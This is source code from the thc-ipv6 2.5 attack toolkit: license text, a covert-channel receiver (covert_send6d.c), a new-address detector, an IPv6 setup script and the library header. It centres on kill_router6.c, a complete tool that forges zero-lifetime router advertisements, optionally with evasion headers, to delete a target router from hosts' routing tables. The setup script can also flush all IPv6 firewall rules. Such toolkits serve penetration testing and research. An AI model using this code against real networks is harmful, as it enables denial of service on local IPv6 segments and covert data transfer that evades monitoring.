2 of the * License, or (at your option) any later version. 
* * This program is distributed in the hope that it will be useful, but * is provided AS IS, WITHOUT ANY WARRANTY; without even the implied * warranty of MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, and * NON-INFRINGEMENT. See the GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place - Suite 330, Boston, * MA 02111-1307, USA. * * In addition, as a special exception, the copyright holders give * permission to link the code of portions of this program with the * OpenSSL library under certain conditions as described in each * individual source file, and distribute linked combinations * including the two. * You must obey the GNU General Public License in all respects * for all of the code used other than OpenSSL. If you modify * file(s) with this exception, you may extend this exception to your * version of the file(s), but you are not obligated to do so. If you * do not wish to do so, delete this exception statement from your * version. If you delete this exception statement from all source * files in the program, then also delete it here. */ Certain source files in this program permit linking with the OpenSSL library (http://www.openssl.org), which otherwise wouldn't be allowed under the GPL. For purposes of identifying OpenSSL, most source files giving this permission limit it to versions of OpenSSL having a license identical to that listed in this file (LICENSE.OpenSSL). It is not necessary for the copyright years to match between this file and the OpenSSL version in question. However, note that because this file is an extension of the license statements of these source files, this file may not be changed except with permission from all copyright holders of source files in this program which reference this file. LICENSE ISSUES ============== The OpenSSL toolkit stays under a dual license, i.e. 
both the conditions of the OpenSSL License and the original SSLeay license apply to the toolkit. See below for the actual license texts. Actually both licenses are BSD-style Open Source licenses. In case of any license issues related to OpenSSL please contact openssl-core@openssl.org. OpenSSL License --------------- /* ==================================================================== * Copyright (c) 1998-2001 The OpenSSL Project. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * 3. All advertising materials mentioning features or use of this * software must display the following acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit. (http://www.openssl.org/)" * * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to * endorse or promote products derived from this software without * prior written permission. For written permission, please contact * openssl-core@openssl.org. * * 5. Products derived from this software may not be called "OpenSSL" * nor may "OpenSSL" appear in their names without prior written * permission of the OpenSSL Project. * * 6. 
Redistributions of any form whatsoever must retain the following * acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit (http://www.openssl.org/)" * * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. * ==================================================================== * * This product includes cryptographic software written by Eric Young * (eay@cryptsoft.com). This product includes software written by Tim * Hudson (tjh@cryptsoft.com). * */ Original SSLeay License ----------------------- /* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com) * All rights reserved. * * This package is an SSL implementation written * by Eric Young (eay@cryptsoft.com). * The implementation was written so as to conform with Netscapes SSL. * * This library is free for commercial and non-commercial use as long as * the following conditions are aheared to. The following conditions * apply to all code found in this distribution, be it the RC4, RSA, * lhash, DES, etc., code; not just the SSL code. The SSL documentation * included with this distribution is covered by the same copyright terms * except that the holder is Tim Hudson (tjh@cryptsoft.com). 
* * Copyright remains Eric Young's, and as such any Copyright notices in * the code are not to be removed. * If this package is used in a product, Eric Young should be given attribution * as the author of the parts of the library used. * This can be in the form of a textual message at program startup or * in documentation (online or textual) provided with the package. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * "This product includes cryptographic software written by * Eric Young (eay@cryptsoft.com)" * The word 'cryptographic' can be left out if the rouines from the library * being used are not cryptographic related :-). * 4. If you include any Windows specific code (or a derivative thereof) from * the apps directory (application code) you must include an acknowledgement: * "This product includes software written by Tim Hudson (tjh@cryptsoft.com)" * * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * The licence and distribution terms for any publically available version or * derivative of this code cannot be changed. i.e. this code cannot simply be * copied and put under another distribution licence * [including the GNU Public Licence.] */ thc-ipv6-2.5/covert_send6d.c0000644000000000000000000000747712251022434014441 0ustar rootroot#include #include #include #include #ifndef _HAVE_SSL int main() { fprintf(stderr, "Error: thc-ipv6 was compiled without openssl support, covert_send6d disabled.\n"); return -1; } #else #if (_TAKE2 > 0) int main() { fprintf(stderr, "Error: tool does not work on big endian\n"); return -1; } #endif #include #include #include #include #include #include #include #include #include "thc-ipv6.h" FILE *f; BF_KEY bfkey; int rawmode = 0, seq = 1, id = 0, num = 0; char hash[20] = "", *key = NULL, vec[8] = { 0, 0, 0, 0, 0, 0, 0, 0 }; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-k key] interface file\n\n", prg); printf("Options:\n"); printf(" -k key decrypt the content with Blowfish-160\n"); printf("\n"); printf("Writes covertly received content to FILE.\n"); exit(-1); } void check_packets(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { int len = header->caplen, rlen, bytes = 0, hlen, end = 0, pos, dlen = 0, done = 0; unsigned char *ptr = (unsigned char *) data, rbuf[6000], wbuf[6000]; if (!rawmode) { if (do_hdr_size) { ptr += 
do_hdr_size; len -= do_hdr_size; if ((ptr[0] & 240) != 0x60) return; } else { ptr += 14; len -= 14; } } if (len < 58) // too short return; if (ptr[6] != NXT_DST) return; if (ptr[42] != 0x10 || ptr[43] != 4 || ptr[48] != 0x11 || ptr[49] != 4 || ptr[54] != 0x12) return; if (memcmp(ptr + 50, (char *) &seq, 4) != 0) return; if (seq == 1) memcpy((char *) &id, ptr + 44, 4); else if (memcmp(ptr + 44, (char *) &id, 4) != 0) return; dlen = 40 + (ptr[41] + 1) * 8; rlen = len - 54; pos = 54; while (rlen > 0 && end == 0 && dlen >= pos && done == 0) { if (ptr[pos] == 0) done = 1; else if (ptr[pos] < 0x12) return; else if (ptr[pos] > 0x1f) return; else if (ptr[pos] == 0x1f) end = 1; else { if ((hlen = ptr[pos + 1]) >= rlen) return; if (bytes + hlen >= sizeof(rbuf)) return; memcpy(rbuf + bytes, ptr + pos + 2, hlen); rlen = rlen - (hlen + 2); pos = pos + hlen + 2; bytes = bytes + hlen; } } if (bytes > 0) { if (key != NULL) { BF_cfb64_encrypt((unsigned char *) rbuf, (unsigned char *) wbuf, bytes, &bfkey, (unsigned char *) vec, &num, BF_DECRYPT); memcpy(rbuf, wbuf, bytes); } fwrite(rbuf, 1, bytes, f); } printf("Received packet seq# %d\n", seq); seq++; if (end) { printf("All received.\n"); fclose(f); exit(0); } } int main(int argc, char *argv[]) { char *interface; pcap_t *p; int i; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "rk:")) >= 0) { switch (i) { case 'r': rawmode = 1; thc_ipv6_rawmode(1); break; case 'k': key = optarg; break; default: fprintf(stderr, "Unknown option\n"); exit(-1); } } interface = argv[optind]; if ((f = fopen(argv[optind + 1], "w")) == NULL) { fprintf(stderr, "Error: file %s cout not be created\n", argv[optind + 1]); exit(-1); } if (key != NULL) { memset(&bfkey, 0, sizeof(bfkey)); SHA1((unsigned char *) key, strlen(key), (unsigned char *) hash); BF_set_key(&bfkey, sizeof(hash), (unsigned char *) hash); memset(vec, 0, sizeof(vec)); num = 0; } if ((p = thc_pcap_init(interface, "ip6")) == NULL) { fprintf(stderr, 
"Error: could not capture on interface %s\n", interface); exit(-1); } while (1) { thc_pcap_check(p, (char *) check_packets, NULL); usleep(50); } return 0; } #endif thc-ipv6-2.5/extract_hosts6.sh0000755000000000000000000000152612234222354015040 0ustar rootroot#!/bin/bash test -z "$1" -o "$1" = "-h" && { echo $0 FILE echo prints the host parts of IPv6 addresses in FILE #, specify - for stdin exit 1 } test -e "$1" -o "$1" = "-" || { echo Error: File $1 not found exit 1 } { test "$1" = "-" && { echo no } || { cat $1 | egrep :: | egrep -v '^[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}|[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}$' | sed 's/.*::/::/' cat $1 | egrep -v :: | awk -F: '{print "::"$5":"$6":"$7":"$8}' cat $1 | egrep :: | egrep '^[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}|[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}:[0-9a-fA-F]{1,4}$' | sed 's/::/:0:0:/' | awk -F: '{print "::"$5":"$6":"$7":"$8}' } } | sort -n exit 0 thc-ipv6-2.5/detect-new-ip6.c0000644000000000000000000000452212251022434014413 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" unsigned char *pkt = NULL, *dstmac, *dst; int pkt_len = 0; int mychecksum; char *interface, *script = NULL, es[300]; char *ptr3, *ptr4; int i; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s interface [script]\n\n", prg); printf("This tools detects new IPv6 addresses joining the local network.\n"); printf("If script is supplied, it is executed with the detected IPv6 address as first\nand the interface as second command line option.\n\n"); exit(-1); } void intercept(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *ipv6hdr = (unsigned char *) (data + 14); int len = header->caplen - 14; if (do_hdr_size) 
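{
    /* custom link-layer header size: re-derive the IPv6 header position */
    ipv6hdr = (unsigned char *) (data + do_hdr_size);
    len = header->caplen - do_hdr_size;
    /* at least one byte must have been captured before the version nibble is read */
    if (len < 1 || (ipv6hdr[0] & 240) != 0x60)
      return;
  }

  if (debug) {
    printf("DEBUG: packet received\n");
    thc_dump_data((unsigned char *) data, header->caplen, "Received Packet");
  }

  /* Check the captured length first: the tests below read header bytes up to
   * offset 63, and the length used to be evaluated only after bytes 6 and 40
   * had already been read from a possibly shorter capture. */
  if (len < 64 || ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[40] != ICMP6_NEIGHBORSOL)
    return;

  /* bytes 8..15 are the first half of the source address; a duplicate address
   * detection probe has them all zero */
  if (*(ipv6hdr + 8) + *(ipv6hdr + 9) + *(ipv6hdr + 10) + *(ipv6hdr + 11) + *(ipv6hdr + 12) + *(ipv6hdr + 13) + *(ipv6hdr + 14) + *(ipv6hdr + 15) != 0)
    return;

  if (debug)
    printf("DEBUG: packet is a valid duplicate ip6 check via icmp6 neighbor solitication\n");

  /* reap one finished script child, if any, without blocking */
  (void) wait3(NULL, WNOHANG, NULL);

  /* bytes 48..63 hold the target address of the solicitation */
  ptr4 = thc_ipv62notation((char *) (ipv6hdr + 48));
  if (ptr4 == NULL)
    return;
  printf("Detected new ip6 address: %s\n", ptr4);

  if (script != NULL && fork() == 0) {
    /* NOTE(review): the command line is run by the shell through system().
     * script and interface come from argv and ptr4 from thc_ipv62notation();
     * keep the script argument under the operator's control. */
    int n = snprintf(es, sizeof(es), "%s %s %s", script, ptr4, interface);

    /* never execute a command line that did not fit into es[] */
    if (n < 0 || n >= (int) sizeof(es))
      fprintf(stderr, "Error: command line too long, not executing - %s\n", script);
    else if (system(es) < 0)
      fprintf(stderr, "Error: Executing failed - %s\n", es);
    exit(0);
  }

  free(ptr4);
  return;
}

/*
 * Entry point: argv[1] is the interface, the optional argv[2] a script that is
 * run for every detected address. Hands all icmp6 traffic to intercept().
 */
int main(int argc, char *argv[]) {
  if (argc < 2 || strncmp(argv[1], "-h", 2) == 0)
    help(argv[0]);

  interface = argv[1];
  if (argc > 2)
    script = argv[2];

  /* unbuffered output so that detections show up immediately */
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);

  printf("Started ICMP6 DAD detection (Press Control-C to end) ...\n");
  return thc_pcap_function(interface, "icmp6", (char *) intercept, 1, NULL);
}
thc-ipv6-2.5/thc-ipv6-setup.sh0000755000000000000000000000675712234222355014672 0ustar rootroot#!/bin/bash ON=1 OK="" test "$1" = "on" && { shift ; } test "$1" = "enable" && { shift ; } test "$1" = "en" && { shift ; } test "$1" = "ea" && { shift ; } test "$1" = "off" && { ON=0 ; shift ; } test "$1" = "no" && { ON=0 ; shift ; } test "$1" = "non" && { ON=0 ; shift ; } test "$1" = "disable" && { ON=0 ; shift ; } test "$1" = "dis" && { ON=0 ; shift ; } test "$2" = "off" && { ON=0 ; shift ; } test "$2" = "no" && { ON=0 ; shift ; } test "$2" = "non" && { ON=0 ; shift ; } test "$2" = "disable" && { ON=0 ; shift ; } test "$2" = "dis" && { ON=0 ; shift ; } test "$1" = "-h" -o "$1" = "help" -o 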
"$1" = "--help" -o -z "$1" && { echo "Syntax: $0 [no] command [options]" echo echo Available commands: echo "" ipv6 - enable ipv6 "(option: interface)" echo "" ra - "enables everything router advertisement (RA) (option: interface)" echo "" autoconf - perform autoconfiguration "(option: interface)" echo "" route - enables default route on RA "(option: interface)" echo "" dad - enable duplicate address detection "(option: interface)" echo "" privacy - enable the temporary address privacy extension "(option: interface)" echo "" forward - enables or disables forwarding echo "" redirfilter - sets ip6table to prevent sedning redirects "(option: interface)" echo "" src - enables or disables source routing and routing echo "" fwreset - reset the ipv6 firewalls echo prepend the keyword \"no\" to use reverse the function of the command OK=1 } test "$1" = "srcroute" -o "$1" = "sourceroute" -o "$1" = "src" && { for i in /proc/sys/net/ipv6/conf/*; do echo $ON > $i/accept_source_route echo $ON > $i/forwarding done OK=1 } test "$1" = "route" -o "$1" = "routing" -o "$1" = "forward" -o "$1" = "forwarding" && { for i in /proc/sys/net/ipv6/conf/*; do echo $ON > $i/forwarding done OK=1 } test "$1" = "dad" && { INT=$2 test -z "$2" && INT=all echo $ON > /proc/sys/net/ipv6/conf/$INT/accept_dad echo $ON > /proc/sys/net/ipv6/conf/$INT/dad_transmits OK=1 } test "$1" = "redirfilter" -o "$1" = "redir" && { INT="" test -n "$2" && INT="-o $2" ip6tables -I OUTPUT $INT -p icmpv6 --icmpv6-type redirect -j DROP OK=1 } test "$1" = "autoconf" -o "$1" = "autoconfig" -o "$1" = "autoconfiguration" -o "$1" = "slaac" && { INT=$2 test -z "$2" && INT=all echo $ON > /proc/sys/net/ipv6/conf/$INT/autoconf OK=1 } test "$1" = "privacy" -o "$1" = "priv" -o "$1" = "tempaddr" -o "$1" = "tempaddress" && { INT=$2 test -z "$2" && INT=all echo $ON > /proc/sys/net/ipv6/conf/$INT/use_tempaddr OK=1 } test "$1" = "firewall" -o "$1" = "fwreset" -o "$1" = "resetfw" && { ip6tables -F ip6tables -X ip6tables -Z ip6tables -P 
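INPUT ACCEPT
  # NOTE: together with the flush commands before it, this leaves every
  # ip6tables chain empty with an ACCEPT policy, i.e. no IPv6 filtering at all.
  ip6tables -P FORWARD ACCEPT
  ip6tables -P OUTPUT ACCEPT
  OK=1
}

# route: accept (ON=1) or ignore (ON=0) the default router announced in RAs.
test "$1" = "route" -o "$1" = "routes" && {
  INT="$2"
  test -z "$2" && INT=all
  echo $ON > "/proc/sys/net/ipv6/conf/$INT/accept_ra_defrtr"
  OK=1
}

# ra: switch router advertisement processing and everything derived from it.
test "$1" = "ra" && {
  INT="$2"
  test -z "$2" && INT=all
  echo $ON > "/proc/sys/net/ipv6/conf/$INT/accept_ra"
  echo $ON > "/proc/sys/net/ipv6/conf/$INT/accept_ra_defrtr"
  echo $ON > "/proc/sys/net/ipv6/conf/$INT/accept_ra_pinfo"
  echo $ON > "/proc/sys/net/ipv6/conf/$INT/autoconf"
  OK=1
}

# ipv6: enable or disable IPv6, on one interface or (no option) globally.
test "$1" = "ipv6" -o "$1" = "ip6" && {
  INT="$2"
  test -z "$2" && {
    INT=all
    # Fixed inversion: enabling loads the module, disabling unloads it
    # (the two commands were swapped, so "ipv6" removed the module).
    test "$ON" = 1 && modprobe -v ipv6
    test "$ON" = 0 && rmmod ipv6
  }
  # disable_ipv6 has the opposite sense of ON
  test "$ON" = 0 && RON=1
  test "$ON" = 1 && RON=0
  # the sysctl is gone once the module has been unloaded successfully
  test -e "/proc/sys/net/ipv6/conf/$INT/disable_ipv6" &&
    echo $RON > "/proc/sys/net/ipv6/conf/$INT/disable_ipv6"
  OK=1
}

test -z "$OK" && { echo "Error: unknown command: $1" ; exit 1 ; }
thc-ipv6-2.5/kill_router6.c0000644000000000000000000001442512251022440014301 0ustar rootroot#include #include #include #include #include #include #include #include #include #include #include "thc-ipv6.h" char *frbuf, *frbuf2, *frint, buf3[1504]; int frbuflen, frbuf2len, do_hop = 0, do_frag = 0, do_dst = 0, type = NXT_ICMP6; unsigned char *frip6, *frmac, *frdst; thc_ipv6_hdr *frhdr = NULL; void help(char *prg) { printf("%s %s (c) 2013 by %s %s\n\n", prg, VERSION, AUTHOR, RESOURCE); printf("Syntax: %s [-HFD] interface router-address [srcmac [dstmac]]\n\n", prg); printf("Announce that a target a router going down to delete it from the routing tables.\n"); printf("If you supply a '*' as router-address, this tool will sniff the network for any\n"); printf("RA packet and immediately send the kill packet.\n"); printf("Option -H adds hop-by-hop, -F fragmentation header and -D dst header.\n"); // printf("Use -r to use raw mode.\n\n"); exit(-1); } void send_ra_kill(u_char *foo, const struct pcap_pkthdr *header, const unsigned char *data) { unsigned char *pkt = NULL, *src = (unsigned char *) data + 14 + 8, *srcmac = (unsigned char *) data + 6, *ipv6hdr = (unsigned char *) (data + 14), 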
*target; int pkt_len = 0, cnt, i, len = header->caplen - 14, offset = 14; if (do_hdr_size) { src = (unsigned char *) (data + 8 + do_hdr_size); // srcmac is ignore anyway ipv6hdr = (unsigned char *) (data + do_hdr_size); len = header->caplen - do_hdr_size; if ((ipv6hdr[0] & 240) != 0x60) return; offset = do_hdr_size; } if (ipv6hdr[6] != NXT_ICMP6 || ipv6hdr[40] != ICMP6_ROUTERADV || len < 40 + 16 || (ipv6hdr[46] == 0 && ipv6hdr[47] == 0)) return; if ((pkt = thc_create_ipv6_extended(frint, PREFER_LINK, &pkt_len, src, frdst, 255, 0, 0, 0xe0, 0)) == NULL) return; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, frbuf2len) < 0) return; } if (do_frag) { type = NXT_FRAG; for (i = 0; i <= do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0) return; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0x40080000, frbuf, frbuflen, 0) < 0) return; if (do_dst) { thc_generate_pkt(frint, srcmac, NULL, pkt, &pkt_len); frhdr = (thc_ipv6_hdr *) pkt; thc_send_as_fragment6(frint, src, frdst, type, frhdr->pkt + 40 + offset, frhdr->pkt_len - 40 - offset, 1240); } else { if (thc_generate_and_send_pkt(frint, srcmac, NULL, pkt, &pkt_len) < 0) return; } target = thc_ipv62notation(src); printf("Sent RA kill packet for %s\n", target); free(target); pkt = thc_destroy_packet(pkt); } int main(int argc, char *argv[]) { char *interface, mac[16] = "", dmac[16] = "", string[] = "ip6 and icmp6 and dst ff02::1"; unsigned char *mac6 = mac, *ip6; unsigned char buf[512], *ptr, buf2[6]; unsigned char *dst = thc_resolve6("ff02::1"); unsigned char *dstmac = dmac; int i, cnt, offset = 14; unsigned char *pkt = NULL; int pkt_len = 0; int rawmode = 0; pcap_t *p; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); frdst = dst; while ((i = getopt(argc, argv, "FHDr")) >= 0) { switch (i) { case 'r': thc_ipv6_rawmode(1); rawmode = 1; 
break; case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 2) help(argv[0]); frbuf = buf; frbuf2 = buf2; frbuf2len = sizeof(buf2); if (do_hdr_size) offset = do_hdr_size; interface = argv[optind]; frint = argv[optind]; if (argc - optind >= 4 && (ptr = argv[optind + 3]) != NULL) sscanf(ptr, "%x:%x:%x:%x:%x:%x", (unsigned int *) &dmac[0], (unsigned int *) &dmac[1], (unsigned int *) &dmac[2], (unsigned int *) &dmac[3], (unsigned int *) &dmac[4], (unsigned int *) &dmac[5]); else dstmac = NULL; if (argc - optind >= 3 && (ptr = argv[optind + 2]) != NULL) sscanf(ptr, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); else mac6 = thc_get_own_mac(interface); if (argv[optind + 1][0] == '*' || argv[optind + 1][1] == '*') { ip6 = NULL; } else { ip6 = thc_resolve6(argv[optind + 1]); if (ip6 == NULL) { fprintf(stderr, "Error: target-router address is invalid: %s\n", argv[optind + 1]); exit(-1); } } memset(buf, 0, sizeof(buf)); memset(buf2, 0, sizeof(buf2)); memset(buf3, 0, sizeof(buf3)); i = 8; frbuflen = i; if ((p = thc_pcap_init_promisc(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL) return -1; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, 6) < 0) return -1; } if (do_frag) { type = NXT_FRAG; for (i = 0; i <= do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0) return -1; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0x40080000, buf, i, 0) < 0) 
return -1; if (thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) return -1; frhdr = (thc_ipv6_hdr *) pkt; printf("Starting to sending router kill entries for %s (Press Control-C to end) ...\n", argv[optind + 1]); while (1) { if (ip6 == NULL) { while (thc_pcap_check(p, (char *) send_ra_kill, NULL) > 0); } else { if (do_dst) { thc_send_as_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + offset, frhdr->pkt_len - 40 - offset, 1240); } else { thc_send_pkt(interface, pkt, &pkt_len); } sleep(3); printf("RA kill packet to %s sent.\n", argv[optind + 1]); } usleep(60); } return 0; } thc-ipv6-2.5/thc-ipv6.h0000644000000000000000000003171112254534432013336 0ustar rootroot/* * (c) 2013 by van Hauser / THC * * THC IPv6 Attack Library Header Files * * License: AGPL v3.0 (see LICENSE file) * */ #ifndef _THC_IPV6_H #define _THC_IPV6_H #include #include #ifdef _HAVE_SSL #include #endif #define VERSION "v2.5" #define AUTHOR "van Hauser / THC " #define RESOURCE "www.thc.org" // you can change the following if you want to: #define SHOW_LIBRARY_ERRORS 1 //#define MULTICAST_ALL_NODES #define ICMP6_UNREACH 1 #define ICMP6_TOOBIG 2 #define ICMP6_TTLEXEED 3 #define ICMP6_PARAMPROB 4 #define ICMP6_PING 128 #define ICMP6_PONG 129 #define ICMP6_PINGREQUEST 128 #define ICMP6_PINGREPLY 129 #define ICMP6_ECHOREQUEST 128 #define ICMP6_ECHOREPLY 129 #define ICMP6_MLD_QUERY 130 #define ICMP6_MLD_REPORT 131 #define ICMP6_MLD_DONE 132 #define ICMP6_ROUTERSOL 133 #define ICMP6_ROUTERADV 134 #define ICMP6_NEIGHBORSOL 135 #define ICMP6_NEIGHBORADV 136 #define ICMP6_REDIR 137 #define ICMP6_INFOREQUEST 139 #define ICMP6_NODEQUERY 139 #define ICMP6_INFOREPLY 140 #define ICMP6_NODEREPLY 140 #define ICMP6_INVNEIGHBORSOL 141 #define ICMP6_INVNEIGHBORADV 142 #define ICMP6_MLD2_REPORT 143 #define ICMP6_MOBILE_PREFIXSOL 146 #define ICMP6_MOBILE_PREFIXADV 147 #define ICMP6_CERTPATHSOL 148 #define ICMP6_CERTPATHADV 149 #define ICMP6_MLD_ROUTERADV 151 #define ICMP6_MLD_ROUTERSOL 152 #define 
ICMP6_MLD_ROUTERTERMINATION 153 #define ICMP6_ROUTERPROXYSOL 154 #define ICMP6_ROUTERPROXYADV 155 #define ICMP6_NEIGHBORADV_ROUTER 0x80000000 #define ICMP6_NEIGHBORADV_SOLICIT 0x40000000 #define ICMP6_NEIGHBORADV_OVERRIDE 0x20000000 #define PREFER_HOST 16 #define PREFER_LINK 32 #define PREFER_GLOBAL 0 #if __BYTE_ORDER == __LITTLE_ENDIAN #define _TAKE4 0 #define _TAKE3 0 #define _TAKE2 0 #elif __BYTE_ORDER == __BIG_ENDIAN #define _TAKE4 (sizeof(void*) - 4) #define _TAKE3 (sizeof(void*) - 3) #define _TAKE2 (sizeof(void*) - 2) #else #error "Unknown Byte Order!" #endif extern int debug; extern int _thc_ipv6_showerrors; extern int do_hdr_size; extern void thc_ipv6_show_errors(int mode); extern int thc_pcap_function(char *interface, char *capture, char *function, int promisc, char *opt); extern pcap_t *thc_pcap_init(char *interface, char *capture); extern pcap_t *thc_pcap_init_promisc(char *interface, unsigned char *capture); extern void thc_ipv6_rawmode(int mode); extern int thc_pcap_check(pcap_t * p, char *function, char *opt); extern char *thc_pcap_close(pcap_t * p); extern unsigned char *thc_resolve6(char *target); extern unsigned char *thc_lookup_ipv6_mac(char *interface, unsigned char *dst); extern unsigned char *thc_get_own_mac(char *interface); extern int thc_get_mtu(char *interface); extern unsigned char *thc_get_own_ipv6(char *interface, unsigned char *dst, int prefer); extern unsigned char *thc_get_multicast_mac(unsigned char *dst); extern unsigned char *thc_get_mac(char *interface, unsigned char *src, unsigned char *dst); extern unsigned char *thc_inverse_packet(unsigned char *pkt, int pkt_len); extern int thc_ping6(char *interface, unsigned char *src, unsigned char *dst, int size, int count); extern int thc_ping26(char *interface, unsigned char *srcmac, unsigned char *dstmac, unsigned char *src, unsigned char *dst, int size, int count); extern int thc_neighboradv6(char *interface, unsigned char *src, unsigned char *dst, unsigned char *srcmac, unsigned char 
*dstmac, unsigned int flags, unsigned char *target); extern int thc_neighborsol6(char *interface, unsigned char *src, unsigned char *dst, unsigned char *target, unsigned char *srcmac, unsigned char *dstmac); extern int thc_routeradv6(char *interface, unsigned char *src, unsigned char *dst, unsigned char *srcmac, unsigned char default_ttl, int managed, unsigned char *prefix, int prefixlen, int mtu, unsigned int lifetime); extern int thc_routersol6(char *interface, unsigned char *src, unsigned char *dst, unsigned char *srcmac, unsigned char *dstmac); extern int thc_toobig6(char *interface, unsigned char *src, unsigned char *srcmac, unsigned char *dstmac, unsigned int mtu, unsigned char *pkt, int pkt_len); extern int thc_paramprob6(char *interface, unsigned char *src, unsigned char *srcmac, unsigned char *dstmac, unsigned char code, unsigned int pointer, unsigned char *pkt, int pkt_len); extern int thc_unreach6(char *interface, unsigned char *src, unsigned char *srcmac, unsigned char *dstmac, unsigned char code, unsigned char *pkt, int pkt_len); extern int thc_redir6(char *interface, unsigned char *src, unsigned char *srcmac, unsigned char *dstmac, unsigned char *newrouter, unsigned char *newroutermac, unsigned char *pkt, int pkt_len); extern int thc_send_as_fragment6(char *interface, unsigned char *src, unsigned char *dst, unsigned char type, unsigned char *data, int data_len, int frag_len); extern int thc_send_as_overlapping_first_fragment6(char *interface, unsigned char *src, unsigned char *dst, unsigned char 